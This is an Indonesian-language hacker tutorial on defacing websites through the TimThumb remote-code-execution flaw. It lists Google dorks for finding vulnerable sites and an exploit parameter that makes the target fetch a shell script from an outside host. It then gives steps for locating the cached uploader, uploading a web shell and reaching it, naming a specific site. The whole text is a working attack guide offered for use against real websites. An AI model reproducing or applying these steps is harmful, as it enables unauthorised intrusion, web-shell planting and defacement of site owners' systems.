Cara Deface Poc Timthumb RCE 1.x.x

Assalamualaikum wr wb, Yeyeyeye balik lage sama w Nelo.F4. Di kesempatan kali ini w bakal bikin artikel Cara Deface Poc Timthum RCE Versi 2 kebawah ea gan. Langsung aja ke tutornya gan sikat!~~crot~~

Dork: (dorking on google images)
inurl:/admin/timthumb.php site:.com
inurl:/timthumb.php site:.vn

selebihnya dimari gan!

Exploitnye: ?src=http://picasa.com.2pproject.ca/shell.php

nah tugas lu orang sekarang ngedorking dulu dah, disini kesabaran lu orang bakalan di uji h3h3h3

ciri ciri site vuln kek gini

hajar gan langsung pake exploitnya !1!1!1 malah bengong -_-

bisa diliat dari gambar diatas ada pesan" yang membuat klen berbahagia:v

( cache/external_21a56a11084a89bfd163f3e2778e47ce.php ) < itu tandanya uploader udah masuk tinggal ekse

caranya? ini ( cache/external_21a56a11084a89bfd163f3e2778e47ce.php ) tempel di www.site.com/(disini)

dan taraaaaaaaaa upload shell kesayangan klen ea gan, pijit tulisan Browser cari shell klen terus pijit tulisan Upload. kalo sukses dia bakal kek gini (cek gambar bawah)

terus aksesnya dimana bg? di sini www.kontoru.com/cache/shellklen.php atau bisa juga di www.kontoru.com/path/cache/shellklen.php

suksesssssss!

Oke mungkin ini perpisahan kyta h3h3h3, Sekian aja dari gw Nelo.F4 kalo ada pertanyaan bisa kontak ke fp Explosion Squad Cyber Di Facebook.kurang lebihnya mohon di maafkan wassalamualaikum wr wb.